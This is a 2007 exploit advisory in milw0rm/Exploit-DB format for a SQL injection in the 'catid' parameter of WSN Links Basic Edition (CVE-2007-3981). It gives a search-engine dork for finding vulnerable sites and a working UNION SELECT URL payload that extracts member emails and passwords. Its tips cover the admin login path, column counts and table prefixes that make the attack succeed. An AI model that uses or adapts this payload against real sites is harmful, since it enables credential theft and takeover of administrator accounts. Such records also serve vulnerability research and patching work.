WSN Links Basic Edition - 'catid' SQL Injection

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2007-07-20 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-36270;CVE-2007-3981 
tags: 
aliases:  
screenshot_url:  
application_url: 

--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: wsnforum.com
DORK: Google: intext:"Powered by WSN Links Basic Edition"     Altavista: "Powered by WSN Links Basic Edition"


DESCRIPTION:
pull out member info from the database


EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*


NOTE/TIP:
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !



--==+================================================================================+==--
--==+		    WSN Links Basic Edition SQL Injection Vulnerbility	             +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-21]